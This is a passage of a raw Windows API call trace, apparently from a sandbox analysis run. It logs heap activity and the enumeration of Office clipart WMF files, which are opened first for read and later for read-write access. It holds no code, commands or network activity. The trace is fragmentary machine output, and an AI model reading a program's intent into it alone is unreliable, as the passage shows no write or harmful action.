HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.416] AreFileApisANSI () returned 1 [0102.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0102.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 69 [0102.416] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x265a)) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.479] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eb6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00045_.WMF", cAlternateFileName="")) returned 1 [0102.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0102.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.480] AreFileApisANSI () returned 1 [0102.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0102.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0102.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.480] AreFileApisANSI () returned 1 [0102.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0102.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 69 [0102.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.481] GetFileType (hFile=0x27c) returned 0x1 [0102.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.481] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.481] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.481] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.482] CloseHandle (hObject=0x27c) returned 1 [0102.482] AreFileApisANSI () returned 1 [0102.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 69 [0102.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.482] GetFileType (hFile=0x27c) returned 0x1 [0102.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.482] CloseHandle (hObject=0x27c) returned 1 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.483] AreFileApisANSI () returned 1 [0102.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 69 [0102.484] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eb6)) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0102.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.484] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00098_.WMF", cAlternateFileName="")) returned 1 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0102.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0102.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.485] AreFileApisANSI () returned 1 [0102.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0102.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.485] AreFileApisANSI () returned 1 [0102.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0102.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 69 [0102.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, 